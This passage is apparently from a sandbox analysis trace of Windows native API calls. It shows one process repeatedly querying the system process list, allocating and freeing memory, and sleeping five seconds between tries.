0xc0000004 [0203.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0203.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.998] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0204.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0204.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.142] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0204.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0204.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.295] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0204.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0204.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.699] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0204.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0204.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0204.938] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0204.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0204.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0205.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.159] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0205.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0205.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.406] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0205.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0205.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.650] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0205.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0205.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.806] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0205.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0206.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.058] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0206.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0206.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.208] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0206.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0206.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.496] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0206.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0207.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.339] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0207.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0207.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.523] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0207.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0207.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.796] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0207.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0208.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.006] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0208.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0208.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.179] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0208.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0208.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.457] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0208.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0208.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.676] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0208.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0208.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0208.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0208.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0208.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0208.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.954] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0209.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0209.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.299] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0209.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 